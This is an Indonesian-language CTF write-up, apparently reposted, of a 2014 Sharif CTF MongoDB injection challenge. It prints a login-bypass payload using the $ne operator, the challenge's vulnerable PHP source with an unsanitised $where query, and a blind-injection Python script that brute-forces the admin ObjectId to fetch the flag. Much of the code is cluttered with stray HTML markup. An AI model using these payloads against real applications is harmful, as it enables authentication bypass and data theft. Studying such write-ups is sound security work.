ctf.sharif.edu kompetisi ctf internasional yang gk sengaja ane temuin di google dan menemukan challange mongodb injection + writeupnya yang sangat menarik dalam soal itu seperti ini instruksinya

login and find the flag
http://ctf.sharif.edu:25489

tampilan websitenya seperti ini  :

sharif14_beginning

 

ada form login dengan field username+password+captcha

pertama yang saya lakukan coba untuk view page source untuk mencari clue” , dan tidak ada   . kemudian coba untuk login menggunakan bypass sqli menggunakan ‘ OR ‘ = 1=1 ,dsb

favicon di website tersebut coba kita scan menggunakan exiftool

<span class="c"># exiftool favicon.png</span>
<span class="o">[</span>...<span class="o">]</span>

File Name : favicon.png Directory : . File Size : 2.6 kB File Modification : 2014:09:23 12:59:18+02:00 File Permissions : rw-r–r– File Type : PNG MIME Type : image/png

<span class=”o”>[</span>…<span class=”o”>]</span>

Thumb URI : file:///Users/alz/Developer/git/pictonic/assets/svgs/3e91140ac1bfb9903b91c1b0ca092167.svg

<span class=”o”>[</span>…<span class=”o”>] </span></code></pre>

Menarik file png yang jadi favicon itu ternyata hasil conver dari file .svg , coba kita search file svg nya di google

sharif14_google_svg

 

dan 😀 kita mengetahui sekarang bahwa backend untuk database mereka bukan pakai MySQL/PgSQL tapi pakai MongoDB

karena kita sudah tau menggunakan MongoDB coba cari cara untuk menyerang MongoDB seperti ini

idontplaydarts.com – “Mongodb is vulnerable to SQL injection in PHP at least

Di website itu kita belajar bagaimana MongoDB + Php bekerja

<span class="x">$collection->find(array(</span>
<span class="x">    "username" => $_GET['username'],</span>
<span class="x">    "passwd" => $_GET['passwd']</span>
<span class="x">));

</span></code></pre>

Script di atas sama dengan

<span class="x">mysql_query("SELECT * FROM collection</span>
<span class="x">    WHERE username=" . $_GET['username'] . ",</span>
<span class="x">    AND passwd=" . $_GET['passwd'])</span>

biasanya untuk bypass login form kita buat query selalu mengembalikan nilai true walaupun yang kita masukan username dan password salah seperti

<span class="x">$collection->find(array(</span>
<span class="x">    "username" => "admin",</span>
<span class="x">    "passwd" => array("$ne" => 1)</span>
<span class="x">));</span>

$ne adalah operator mongodb yang maksudnya != ( tidak sama dengan )

Sama Dengan

<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">collection</span>
<span class="k">WHERE</span> <span class="n">username</span><span class="o">=</span><span class="ss">"admin"</span><span class="p">,</span>
<span class="k">AND</span> <span class="n">passwd</span><span class="o">!=</span><span class="mi">1</span>

Dari 2 script di atas kita ketahui bahwa jika passwd != 1 maka nilai yang di kembalikan query (true) atau benar

karena password yang di input tidak benar . maka akan masuk ke dashboard admin

gunakan tamper data untuk mengirimkan post data

<span class="x">username=admin&password[$ne]=1&captcha=AXBYCZ

</span></code></pre>

sesuaikan captcha dengan yang benar

selain dengan tamper data , juga bisa menggunakan inspect element atau firebug untuk bypass login

setelah login akan muncul dashboard seperti ini

panel

 

di panel admin ini di sediakan beberapa source code dari file seperti : login.php , init.php , api.php , panel.php

coba kita lihat ke login.php

<?php
/**
 * User: some one
 * Date: 8/25/14
 * Time: 11:03 AM
 */
session_start();
$m = new MongoClient();
$db = $m->ctf5;
$users_col = $db->users;
$username = $_POST['username'];
$password = $_POST['password'];
$q = array(
    'username' => $username,
    'password' => $password
);

include 'Captcha.php';
$v = Captcha::validate($_POST['captcha']);
if ($v) {
    $_SESSION['time'] = intval(time() / 60);
    $_SESSION['count'] = 25;
}else{
    die('invalid captcha');
}

$user = $users_col->findOne($q);
if(is_null($user)){
    #header("Location: login-failed.html");
    die('invalid username or password');
}else{
    $_SESSION['id'] = $user['_id']->{'$id'};
    header("Location: panel.php");
    die();
}

kalau di script login.php kita bisa liat array nya dipisah

$q = array(<br /> 'username' => $username,<br /> 'password' => $password<br /> );<br /> $user = $users_col->findOne($q);

sama dengan

<span class="x">$collection->find(array(</span>
<span class="x">    "username" => $_GET['username'],</span>
<span class="x">    "passwd" => $_GET['passwd']</span>
<span class="x">));
</span>

lanjut kita liat script init.php

<span class="cp"><?php</span>
<span class="sd">/** </span>
<span class="sd"> * User: some one</span>
<span class="sd"> * Date: 8/25/14</span>
<span class="sd"> * Time: 11:00 AM</span>
<span class="sd"> */</span>

<span class=”k”>function</span> <span class=”nf”>generateRandomString</span><span class=”p”>(</span><span class=”nv”>$length</span> <span class=”o”>=</span> <span class=”mi”>10</span><span class=”p”>)</span> <span class=”p”>{</span> <span class=”nv”>$characters</span> <span class=”o”>=</span> <span class=”s1”>’0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’</span><span class=”p”>;</span> <span class=”nv”>$randomString</span> <span class=”o”>=</span> <span class=”s1”>’‘</span><span class=”p”>;</span> <span class=”k”>for</span> <span class=”p”>(</span><span class=”nv”>$i</span> <span class=”o”>=</span> <span class=”mi”>0</span><span class=”p”>;</span> <span class=”nv”>$i</span> <span class=”o”><</span> <span class=”nv”>$length</span><span class=”p”>;</span> <span class=”nv”>$i</span><span class=”o”>++</span><span class=”p”>)</span> <span class=”p”>{</span> <span class=”nv”>$randomString</span> <span class=”o”>.=</span> <span class=”nv”>$characters</span><span class=”p”>[</span><span class=”nb”>rand</span><span class=”p”>(</span><span class=”mi”>0</span><span class=”p”>,</span> <span class=”nb”>strlen</span><span class=”p”>(</span><span class=”nv”>$characters</span><span class=”p”>)</span> <span class=”o”>-</span> <span class=”mi”>1</span><span class=”p”>)];</span> <span class=”p”>}</span> <span class=”k”>return</span> <span class=”nv”>$randomString</span><span class=”p”>;</span> <span class=”p”>}</span>

<span class=”nv”>$m</span> <span class=”o”>=</span> <span class=”k”>new</span> <span class=”nx”>MongoClient</span><span class=”p”>();</span> <span class=”nv”>$db</span> <span class=”o”>=</span> <span class=”nv”>$m</span><span class=”o”>-></span><span class=”na”>ctf5</span><span class=”p”>;</span> <span class=”nv”>$users_col</span> <span class=”o”>=</span> <span class=”nv”>$db</span><span class=”o”>-></span><span class=”na”>users</span><span class=”p”>;</span> <span class=”nv”>$flag_col</span> <span class=”o”>=</span> <span class=”nv”>$db</span><span class=”o”>-></span><span class=”na”>flag</span><span class=”p”>;</span> <span class=”nv”>$user</span> <span class=”o”>=</span> <span class=”nv”>$users_col</span><span class=”o”>-></span><span class=”na”>findOne</span><span class=”p”>(</span><span class=”k”>array</span><span class=”p”>(</span><span class=”s1”>’username’</span> <span class=”o”>=></span> <span class=”s1”>’admin’</span><span class=”p”>));</span> <span class=”nv”>$flag</span> <span class=”o”>=</span> <span class=”nv”>$flag_col</span><span class=”o”>-></span><span class=”na”>findOne</span><span class=”p”>();</span>

<span class=”c1”>// old codes</span> <span class=”c1”>//$staffs = array(‘gholi’,’bobak’,’bijan’,’arash’);</span> <span class=”c1”>//</span> <span class=”c1”>//foreach($staffs as $staff){</span> <span class=”c1”>// $users_col->insert(array(</span> <span class=”c1”>// ‘username’ => $staff,</span> <span class=”c1”>// ‘role’=>‘staff’,</span> <span class=”c1”>// ‘password’ => generateRandomString(20),</span> <span class=”c1”>// ));</span> <span class=”c1”>//}</span>

<span class=”c1”>//$visitors = array(‘noone’,’bob’,’john’,’alice’);</span> <span class=”c1”>//</span> <span class=”c1”>//foreach($visitors as $visitor){</span> <span class=”c1”>// $users_col->insert(array(</span> <span class=”c1”>// ‘username’ => $visitor,</span> <span class=”c1”>// ‘role’=>‘visitor’,</span> <span class=”c1”>// ‘password’ => generateRandomString(10),</span> <span class=”c1”>// ));</span> <span class=”c1”>//}</span>

<span class=”k”>if</span> <span class=”p”>(</span><span class=”nb”>is_null</span><span class=”p”>(</span><span class=”nv”>$user</span><span class=”p”>))</span> <span class=”p”>{</span> <span class=”nv”>$users_col</span><span class=”o”>-></span><span class=”na”>insert</span><span class=”p”>(</span><span class=”k”>array</span><span class=”p”>(</span> <span class=”s1”>’username’</span> <span class=”o”>=></span> <span class=”s1”>’admin’</span><span class=”p”>,</span> <span class=”s1”>’role’</span><span class=”o”>=></span><span class=”s1”>’admin’</span><span class=”p”>,</span> <span class=”s1”>’password’</span> <span class=”o”>=></span> <span class=”nx”>generateRandomString</span><span class=”p”>(</span><span class=”mi”>30</span><span class=”p”>),</span> <span class=”p”>));</span> <span class=”p”>}</span> <span class=”k”>if</span> <span class=”p”>(</span><span class=”nb”>is_null</span><span class=”p”>(</span><span class=”nv”>$flag</span><span class=”p”>))</span> <span class=”p”>{</span> <span class=”nv”>$flag_col</span><span class=”o”>-></span><span class=”na”>insert</span><span class=”p”>(</span><span class=”k”>array</span><span class=”p”>(</span> <span class=”s1”>’flag’</span> <span class=”o”>=></span> <span class=”nx”>generateRandomString</span><span class=”p”>(</span><span class=”mi”>30</span><span class=”p”>),</span> <span class=”p”>));</span> <span class=”p”>}</span> <span class=”cp”>?></span></code></pre>

penjelasannya di situ ada function random string untuk generate password,id,flag dan ada query insert flag sama insert admin dan init.php ini sepertinya yang akan diload pada setiap file karena koneksi mongodb di buka di script ini

trus coba kita liat script selanjutnya api.php

<span class="cp"><?php</span>
<span class="sd">/**</span>
<span class="sd"> * User: some one</span>
<span class="sd"> * Date: 8/25/14</span>
<span class="sd"> * Time: 11:25 AM</span>
<span class="sd"> */</span>
<span class="nb">session_start</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">is_null</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'id'</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nb">header</span><span class="p">(</span><span class="s2">"Location: index.html"</span><span class="p">);</span>
    <span class="k">die</span><span class="p">();</span>
<span class="p">}</span>
<span class="nv">$ajax</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_X_REQUESTED_WITH'</span><span class="p">])</span> <span class="k">AND</span> <span class="nb">strtolower</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_X_REQUESTED_WITH'</span><span class="p">])</span> <span class="o">===</span> <span class="s1">'xmlhttprequest'</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$ajax</span> <span class="o">=</span> <span class="k">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$ajax</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">die</span><span class="p">();</span>
<span class="p">}</span>
<span class="nv">$T</span> <span class="o">=</span> <span class="mi">60</span><span class="p">;</span>
<span class="nv">$N</span> <span class="o">=</span> <span class="mi">20</span><span class="p">;</span>
<span class="nv">$t</span> <span class="o">=</span> <span class="nb">intval</span><span class="p">(</span><span class="nb">time</span><span class="p">()</span> <span class="o">/</span> <span class="nv">$T</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'time'</span><span class="p">]</span> <span class="o"><</span> <span class="nv">$t</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'time'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">intval</span><span class="p">(</span><span class="nb">time</span><span class="p">()</span> <span class="o">/</span> <span class="nv">$T</span><span class="p">);</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'count'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$N</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'count'</span><span class="p">]</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="nb">header</span><span class="p">(</span><span class="s1">'Content-Type: application/json'</span><span class="p">);</span>
        <span class="k">echo</span> <span class="nb">json_encode</span><span class="p">(</span><span class="k">array</span><span class="p">(</span><span class="s2">"You are so fast. Please slow down. And wait for one minute."</span><span class="p">));</span>
        <span class="k">die</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'count'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'count'</span><span class="p">]</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="nv">$q</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'q'</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nv">$q</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'q'</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$q</span> <span class="o">==</span> <span class="s1">'users'</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$role</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'role'</span><span class="p">];</span>
    <span class="nv">$m</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">MongoClient</span><span class="p">();</span>
    <span class="nv">$db</span> <span class="o">=</span> <span class="nv">$m</span><span class="o">-></span><span class="na">ctf5</span><span class="p">;</span>
    <span class="nv">$users_col</span> <span class="o">=</span> <span class="nv">$db</span><span class="o">-></span><span class="na">users</span><span class="p">;</span>
    <span class="nv">$users</span> <span class="o">=</span> <span class="nv">$users_col</span><span class="o">-></span><span class="na">find</span><span class="p">(</span><span class="k">array</span><span class="p">(</span>
        <span class="s1">'$where'</span> <span class="o">=></span> <span class="s2">"this.role == '</span><span class="si">$role</span><span class="s2">'"</span>
    <span class="p">));</span>
    <span class="nv">$names</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
    <span class="k">foreach</span> <span class="p">(</span><span class="nv">$users</span> <span class="k">as</span> <span class="nv">$user</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$names</span><span class="p">[]</span> <span class="o">=</span> <span class="nv">$user</span><span class="p">[</span><span class="s1">'username'</span><span class="p">];</span>
    <span class="p">}</span>
    <span class="nb">header</span><span class="p">(</span><span class="s1">'Content-Type: application/json'</span><span class="p">);</span>
    <span class="k">echo</span> <span class="nb">json_encode</span><span class="p">(</span><span class="nv">$names</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$q</span> <span class="o">==</span> <span class="s1">'flag'</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$id</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'id'</span><span class="p">];</span>
    <span class="nv">$m</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">MongoClient</span><span class="p">();</span>
    <span class="nv">$db</span> <span class="o">=</span> <span class="nv">$m</span><span class="o">-></span><span class="na">ctf5</span><span class="p">;</span>
    <span class="nv">$flag_col</span> <span class="o">=</span> <span class="nv">$db</span><span class="o">-></span><span class="na">flag</span><span class="p">;</span>
    <span class="nv">$flag</span> <span class="o">=</span> <span class="nv">$flag_col</span><span class="o">-></span><span class="na">findOne</span><span class="p">(</span><span class="k">array</span><span class="p">(</span><span class="s1">'_id'</span> <span class="o">=></span> <span class="k">new</span> <span class="nx">MongoId</span><span class="p">(</span><span class="nv">$id</span><span class="p">)));</span>
    <span class="nb">var_dump</span><span class="p">(</span><span class="nv">$flag</span><span class="p">);</span>
<span class="p">}</span>
<span class="cp">?></span>

fle api.php hanya bisa di buka ketika kita sudah login sehingga $_Session[id] != 0 , dan untuk mengakses file ini kita harus mengganti header dengan XMLHttpRequest

Get parameter Q di gunakan untuk 2 value :

– Untuk mendapatkan user dengan role yang di spesifikasaikan di GET role

-Untuk mendapatkan flag dengan memasukan id dari role admin

<span class="s">api.php?q=flag&id=

</span>Didalam File init.php admin user dan flag di insert pada waktu yang sama di mongodb kita dapat menganggap $id mereka berturut" jika kita bisa mendapatkan $id admin user maka kita akan mudah untuk mendapatkan $id flag

Kesimpulannya kita mencari : - $id dari admin user , - masukan $id untuk dapatkan flag

<span class="cp"><?php</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$q</span> <span class="o">==</span> <span class="s1">'users'</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$role</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'role'</span><span class="p">];</span>
    <span class="nv">$m</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">MongoClient</span><span class="p">();</span>
    <span class="nv">$db</span> <span class="o">=</span> <span class="nv">$m</span><span class="o">-></span><span class="na">ctf5</span><span class="p">;</span>
    <span class="nv">$users_col</span> <span class="o">=</span> <span class="nv">$db</span><span class="o">-></span><span class="na">users</span><span class="p">;</span>
    <span class="nv">$users</span> <span class="o">=</span> <span class="nv">$users_col</span><span class="o">-></span><span class="na">find</span><span class="p">(</span><span class="k">array</span><span class="p">(</span>
        <span class="s1">'$where'</span> <span class="o">=></span> <span class="s2">"this.role == '</span><span class="si">$role</span><span class="s2">'"</span>
    <span class="p">));</span>
    <span class="nv">$names</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
    <span class="k">foreach</span> <span class="p">(</span><span class="nv">$users</span> <span class="k">as</span> <span class="nv">$user</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$names</span><span class="p">[]</span> <span class="o">=</span> <span class="nv">$user</span><span class="p">[</span><span class="s1">'username'</span><span class="p">];</span>
    <span class="p">}</span>
    <span class="nb">header</span><span class="p">(</span><span class="s1">'Content-Type: application/json'</span><span class="p">);</span>
    <span class="k">echo</span> <span class="nb">json_encode</span><span class="p">(</span><span class="nv">$names</span><span class="p">);</span>
<span class="p">}</span>
<span class="cp">?></span>

 

kita akan melakukan blind mongodb injection untuk menebak dari $id dan memanfaatkan oracle response

api.php?q=user&role=admin’ && (this._id.str[x]==’Y’) && ‘1’==’1

x dan y adalah yang akan di rubah untuk bruteforce .. ketika response dari oracle == 9 maka digit itu benar kemudian lanjut ke digit selanjutnya

disini pakai python untuk mengimplementasikan attacknya

<span class="c">#!/usr/bin/python</span>

<span class=”kn”>import</span> <span class=”nn”>urllib</span> <span class=”kn”>import</span> <span class=”nn”>requests</span> <span class=”kn”>import</span> <span class=”nn”>time</span>

<span class=”n”>baseUrl</span> <span class=”o”>=</span> <span class=”s”>”http://ctf.sharif.edu:25489/api.php?q=users&role=”</span> <span class=”n”>headers</span> <span class=”o”>=</span> <span class=”p”>{</span><span class=”s”>’X-Requested-With’</span><span class=”p”>:</span> <span class=”s”>’XMLHttpRequest’</span><span class=”p”>}</span> <span class=”n”>cookies</span> <span class=”o”>=</span> <span class=”nb”>dict</span><span class=”p”>(</span><span class=”n”>PHPSESSID</span><span class=”o”>=</span><span class=”s”>’amuedn0ra3fhj0diatdb4kkkt1’</span><span class=”p”>)</span> <span class=”n”>admin_id</span> <span class=”o”>=</span> <span class=”s”>’‘</span>

<span class=”c”># Guessing admin id</span> <span class=”k”>for</span> <span class=”n”>c</span> <span class=”ow”>in</span> <span class=”nb”>range</span><span class=”p”>(</span><span class=”mi”>0</span><span class=”p”>,</span> <span class=”mi”>24</span><span class=”p”>):</span> <span class=”k”>print</span><span class=”p”>(</span><span class=”s”>”[*] Guessing character “</span><span class=”o”>+</span><span class=”nb”>str</span><span class=”p”>(</span><span class=”n”>c</span> <span class=”o”>+</span> <span class=”mi”>1</span><span class=”p”>))</span> <span class=”k”>for</span> <span class=”n”>x</span> <span class=”ow”>in</span> <span class=”nb”>range</span><span class=”p”>(</span><span class=”mh”>0x10</span><span class=”p”>):</span> <span class=”n”>letter</span> <span class=”o”>=</span> <span class=”n”>format</span><span class=”p”>(</span><span class=”n”>x</span><span class=”p”>,</span><span class=”s”>’x’</span><span class=”p”>)</span> <span class=”n”>query</span> <span class=”o”>=</span> <span class=”s”>”admin’ && (this._id.str[“</span> <span class=”o”>+</span> <span class=”nb”>str</span><span class=”p”>(</span><span class=”n”>c</span><span class=”p”>)</span> <span class=”o”>+</span> <span class=”s”>”]==’“</span> <span class=”o”>+</span> <span class=”n”>letter</span> <span class=”o”>+</span> <span class=”s”>”’) && ‘1’==’1”</span> <span class=”n”>url</span> <span class=”o”>=</span> <span class=”n”>baseUrl</span> <span class=”o”>+</span> <span class=”n”>urllib</span><span class=”o”>.</span><span class=”n”>quote_plus</span><span class=”p”>(</span><span class=”n”>query</span><span class=”p”>)</span> <span class=”n”>response</span> <span class=”o”>=</span> <span class=”n”>requests</span><span class=”o”>.</span><span class=”n”>get</span><span class=”p”>(</span><span class=”n”>url</span><span class=”p”>,</span> <span class=”n”>headers</span> <span class=”o”>=</span> <span class=”n”>headers</span><span class=”p”>,</span> <span class=”n”>cookies</span><span class=”o”>=</span><span class=”n”>cookies</span><span class=”p”>)</span> <span class=”k”>if</span> <span class=”nb”>len</span><span class=”p”>(</span><span class=”n”>response</span><span class=”o”>.</span><span class=”n”>text</span><span class=”p”>)</span><span class=”o”>==</span><span class=”mi”>9</span><span class=”p”>:</span> <span class=”n”>admin_id</span> <span class=”o”>+=</span> <span class=”n”>format</span><span class=”p”>(</span><span class=”n”>x</span><span class=”p”>,</span> <span class=”s”>’x’</span><span class=”p”>)</span> <span class=”k”>print</span><span class=”p”>(</span><span class=”s”>” + Admin id guessed: “</span> <span class=”o”>+</span> <span class=”n”>admin_id</span><span class=”p”>)</span> <span class=”k”>print</span><span class=”p”>(</span><span class=”s”>”“</span><span class=”p”>)</span> <span class=”k”>break</span>

    &lt;span class="n">time&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sleep&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span>

<span class=”c”># Getting the flag</span> <span class=”k”>print</span><span class=”p”>(</span><span class=”s”>”[*] Go for the flag!”</span><span class=”p”>)</span> <span class=”n”>flag_id</span> <span class=”o”>=</span> <span class=”n”>format</span><span class=”p”>(</span><span class=”nb”>int</span><span class=”p”>(</span><span class=”n”>admin_id</span><span class=”p”>,</span> <span class=”mi”>16</span><span class=”p”>)</span> <span class=”o”>+</span> <span class=”mi”>1</span><span class=”p”>,</span> <span class=”s”>’x’</span><span class=”p”>)</span> <span class=”n”>url</span> <span class=”o”>=</span> <span class=”s”>”http://ctf.sharif.edu:25489/api.php?q=flag&id=”</span><span class=”o”>+</span><span class=”n”>flag_id</span> <span class=”n”>response</span> <span class=”o”>=</span> <span class=”n”>requests</span><span class=”o”>.</span><span class=”n”>get</span><span class=”p”>(</span><span class=”n”>url</span><span class=”p”>,</span> <span class=”n”>headers</span> <span class=”o”>=</span> <span class=”n”>headers</span><span class=”p”>,</span> <span class=”n”>cookies</span><span class=”o”>=</span><span class=”n”>cookies</span><span class=”p”>)</span> <span class=”k”>print</span> <span class=”n”>response</span><span class=”o”>.</span><span class=”n”>text </span></code></pre>

<span class="c"># ./sharif14_pwnit.py</span>
<span class="o">[</span>*<span class="o">]</span> Guessing character 1
    + Admin id guessed: 5

<span class=”o”>[</span>*<span class=”o”>]</span> Guessing character 2 + Admin id guessed: 53

<span class=”o”>[</span>…<span class=”o”>]</span>

<span class=”o”>[</span>*<span class=”o”>]</span> Guessing character 23 + Admin id guessed: 53fadd3d7137a495319e10f

<span class=”o”>[</span>*<span class=”o”>]</span> Guessing character 24 + Admin id guessed: 53fadd3d7137a495319e10f3

<span class=”o”>[</span>*<span class=”o”>]</span> Go <span class=”k”>for</span> the flag!

array<span class=”o”>(</span>2<span class=”o”>)</span> <span class=”o”>{</span> <span class=”o”>[</span><span class=”s2”>”_id”</span><span class=”o”>]=</span>> object<span class=”o”>(</span>MongoId<span class=”o”>)</span><span class=”c”>#7 (1) {</span> <span class=”o”>[</span><span class=”s2”>”$id”</span><span class=”o”>]=</span>> string<span class=”o”>(</span>24<span class=”o”>)</span> <span class=”s2”>”53fadd3d7137a495319e10f4”</span> <span class=”o”>}</span> <span class=”o”>[</span><span class=”s2”>”flag”</span><span class=”o”>]=</span>> string<span class=”o”>(</span>30<span class=”o”>)</span> <span class=”s2”>”9fmTOOdbm1A76o40Bb9N3wpqvozdJI”</span> <span class=”o”>}</span></code></pre>

Source : http://blog.dul.ac/2014/10/SHARIF_QUALS_14/